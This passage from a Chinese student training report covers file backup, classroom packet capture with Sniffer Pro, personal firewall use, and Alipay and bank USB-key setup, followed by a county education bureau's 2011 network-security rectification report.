FileGee个人文件同步备份系统是一款优秀的文件同步与备份软件。它集文件备份、同步、加密、分割于一身。协助个人用户实现硬盘之间,硬盘与移动存储设备之间的备份与同步。强大的容错功能和详尽的日志、进度显示,更保证了备份、同步的可靠性。高效稳定、占用资源少的特点,充分满足了用户的需求。不需要额外的硬件资源,便能搭建起一个功能强大、高效稳定的全自动备份环境,是一种性价比极高的选择。
3.1.2 FileGee软件使用
⑴找到“FileGee个人文件同步备份系统”软件安装的图标,双击运行,图-软件运行主界面
⑵选择任务名称遗迹执行方式
图-任务名称与执行方式选项
⑶选择备份原文件位置
图-备份的原文件位置设置
⑷进行备份目标设置
图-备份的目标位置设置
⑸进行备份文件过滤设置
图-需要备份的文件的过滤设置
⑹设置自动备份时间
图-设置自动备份的时间模式
⑺任务的高级设置
图-该任务的高级设置
⑻设置发送结果信息
图-在任务结束后设置发送的结果信息
⑼完成备份
图-该任务完成设置后的主界面
4.网络安全防护
4.1 SnifferPro数据包捕获与协议分析
4.1.1实验原理
数据在网络上是以很小的被称为“帧”或“包”的协议数据单元(PDU)方式传输的。以数据链路层的“帧”为例,“帧”由多个部分组成,不同的部分对应不同的信息以实现相应的功能,例如,以太网帧的前12个字节存放的是源MAC地址和目的MAC地址,这些数据告诉网络该帧的来源和去处,其余部分存放实际用户数据、高层协议的报头如TCP/IP的报头或IPX报头等等。帧的类型与格式根据通信双方的数据链路层所使用的协议来确定,由网络驱动程序按照一定规则生成,然后通过网络接口卡发送到网络中,通过网络传送到它们的目的主机。目的主机按照同样的通信协议执行相应的接收过程。接收端机器的网络接口卡一旦捕获到这些帧,会告诉操作系统有新的帧到达,然后对其进行校验及存储等处理。4.1.2基本的网络数据帧的捕获和解码
⑴Sniffer Pro 4.7的安装与启动
①启动Sniffer Pro 4.7。在获取Sniffer Pro 4.7软件的安装包后,运行安装程序,按要求输入相关信息并输入注册码,若有汉化包请在重启计算机前进行汉化。完成后重启计算机,点击“开始”“程序”“Sniffer Pro”“Sniffer”,启动“Sniffer Pro 4.7”程序。
②选择用于Sniffer的网络接口。如果计算机有多个网络接口设备,则可通过菜单“File”“Select Settings”,选择其中的一个来进行监测。
⑵监测网络中计算机的连接状况
配置好服务器和工作站的TCP/IP设置并启动Sniffer Pro软件,选择
“菜单”中“Monitor(监视器)”“Matrix(主机列表)”,从工作站访问服务器上的资源,如WWW、FTP等,观察检测到的网络中的连接状况,记录下各连接的IP地址和MAC地址。
⑶监测网络中数据的协议分布 选择菜单“Monitor”→“Protocal distribution(协议分布)”,监测数据包中的使用的协议情况。
⑷监测分析网络中传输的ICMP数据
①定义过滤规则:点击菜单“Capture”“Define Filter(定义过滤器)”,在在对话框中进行操作。点击“Address”(地址)选项卡,设置:“地址类型”为IP,“包含”本机地址,即在“位置1”输入本机IP地址,“方向”(Dir.)为“双向”,“位置2”为“任意的”。点击“Advanced(高级)”选项卡,在该项下选择“IP”→“ICMP”。设置完成后点击菜单中“Capture(捕获)”→“Start”开 始记录监测数据。
②从工作站Ping服务器的IP地址。
③观察监测到的结果:点击菜单中“Capture”→“Stop and display”,将进入记录结果的窗口。点击下方各选项卡可观察各项记录,可通过“File”→Save”保存监测记录。
④记录监测到的ICMP传输记录:点击记录窗口下方的解码“Decode(解码)”选项,进入解码窗口,分析记录,找到工作站向服务器发出的请求命令并记录有关信息。
⑸监测分析网络中传输的HTTP数据
①在服务器的Web目录下放置一个网页文件。
②定义过滤规则:点击菜单“Capture”“Define Filter”,在对话框中点“Advanced”选项卡,在该项下选择“IP”→“TCP”→“HTTP”。设置完成后点击菜单中“Capture”→“Start'’开始记录监测数据。
③从工作站用浏览器访问服务器上的网页文件。
④观察监测到的结果:点击菜单中“Capture”→“Stop and display”,将进入记录结果的窗口,点击下方各选项卡可观察各项记录。点击“File”→Save”保存记录。
⑤记录监测到的HTTP传输记录:点击记录窗口下方的解码“Decode”选项,进入解码窗口,分析记录,找到工作站向服务器发出的网页请求命令并记录有关信息。
⑹监测分析网络中传输的FTP数据
①启用服务器的Serv-U软件,在FTP服务目录下放置一个文本文件。最好在FTP中建立两个用户,即匿名用户(anonymous)和一个授权用户(用
户名、权限自定)。
②定义过滤规则:点击菜单“Capture”→“Define Filter”,在“Summary”选项卡下点击“Reset"按钮将过滤规则恢复到初始状态,然后在“Advanced”选项卡下选择“IP”→“TCP”→“FTP”。设置完成后点击菜单“Capture”→“Start”开始记录监测数据。
③从工作站用FTP下载服务器上的文本文件。
④观察监测到的结果:点击菜单“Capture”→“Stop and display”,进入记录结果的窗口,点击下方各选项卡观察各项记录并保存记录。监控显示如图1-6所示。可以看到登录密码也是明文显示的。
⑤记录监测到的FTP传输记录:点击记录窗口下方的解码“Decode”选项,进入解码窗口,分析记录,找到工作站向服务器发出的FTP命令并记录。
4.2 天网防火墙的使用
⑴在这我们可以看到在防火墙监控中的应用程序,点击该程序的“选项”按钮,我们可以设置更为详细的规则,如图
⑵点击
⑶
⑸这样就能看到网络访问情况了,框:
为结束进程键,当用户发现有不法进程而要终止它们运行的时候,可以利用这个键。按下后出现以下提示
⑹
⑺为“连接网络”状态,为“断开网络”状态,如果按下断开/接通网络按钮,那么您的计算机就将完全与网络断开,就好像拔下了网线一样。没有任何人可以访问您的计算机,但您也不可以访问网络。这是在遇到频繁攻击的时候最有效的应对方法。
5.应用安全
5.1支付宝数字证书
⑴直接登录支付宝,在安全中心页面,点击安装数字证书;
⑵点击【安装数字证书】,选择【通过手机短信】后点击【下一步】(收银台页面安装时默认通过手机短信),进入安装证书页面;
⑶选择证书使用地点,输入【验证码】;
⑷输入手机上收到的校验码,点击【确定】;
4)安装成功。
5.2 USB KEY的使用
⑴将USBKey插入计算机的USB接口,电脑系统会自动安装USBKey管理工具,安装成功后电脑屏幕右下角显示USBKey管理工具图标。
⑵USBKey管理工具安装成功后,页面会弹出密码输入框,首次使用USBKey时,会强制您修改USBKey密码,初始密码为8个8,修改后的密码不能过于简单,如8个相同的字母数字,或者12345678此类的均不符合安全性规定,会强制重新设置。
⑶密码修改成功后,就可以点击主页右上角“企业网上银行登录”,在登录页面选择“CA登录”进行登录操作啦。弹出的
总结
网络信息安全是一个关系国家安全和主权、社会稳定、民族文化继承和发扬的重要问题。其重要性,正随着全球信息化步伐的加快越来越重要。经过为期一周的实训使我对网络与信息安全有了进一步的认识。以及对相关软件的操作更加娴熟,网络这个时代的主流已经发展的越来越快了,应用也越来越广泛,组建的再好网站都需要有很高的安全。我们应该持有相关谨慎的态度去面对有关网络信息的挑战。
参考文献 周学广等信息安全学.北京:机械工业出版社,2003.3 2(美)Mandy Andress著杨涛等译计算机安全原理.北京:机械工业版社,2002.1 曹天杰等编著.计算机系统安全.北京:高等教育出版社,2003.9 4 刘衍衍等编著.计算机安全技术.吉林:吉林科技技术出版社.1997.8
第五篇:网络信息安全保密工作整改报告
xx县教体局网络信息安全保密工作
整 改 报 告
自XX 县信息化领导小组对我局进行安全检查以来,我局对 网络信息安全保密工作高度重视,主管局长XX 同志于9 月13 日 组织了“加强网络信息安全保密工作”专题会,会上我们认真分 析了检查小组的指导意见以及在自查中发现的一些管理上的细 节问题;在此基础上制定了网络信息安全保密工作整改方案:
一、以“方城县教育系统网络文明公约”普及为契机,在全县教 育系统进行网络信息安全保密工作的强化宣传教育。
通过强化宣传教育,使教育系统内人人都能认识到网络信息 安全保密工作的重要性,以自觉带自律,从自身的细节处做起,每个人都是一个安全点,点点相边形成安全面。从而强化网络信 息安全保密工作。
二、对入网单位的自查要制度化。
在自查过程中,对部分单位线路架设不规范;五防措施不到 位要求其限期整改的,在整改后进行复查。
成立网络信息安全工作检查小组,在复查的基础上,对所有 入网单位进行不定期、不定时、不定点的突击抽查。以敦促各网 络接入单位对网络信息安全保密工作管理常规化、制度化。
三、对文印室等重要信息点完善管理
针对文印室数据交换时暴露出的移动介质管理不到位的问 题,我们认真分析现况。制订管理方案,并由局办公室专门下发 通知,“通知”要求各科室指定办公用的移动存储设备,并登记 造册,各科室在进行数据交换时不使用指定设备以外的设备,在 进行数据交换前进行相关的安全扫描。
架设物理隔离区的安全扫描机,安装相关安全软件并定期更 新,对进入文印室的移动存储设备进行病毒、木马等相关安全扫 描,确认安全后再进入文印室等重要信息管理区;从而确保重要 信息区的信息安全。
XX 县教体局
2011 年9 月19 日
点击咨询 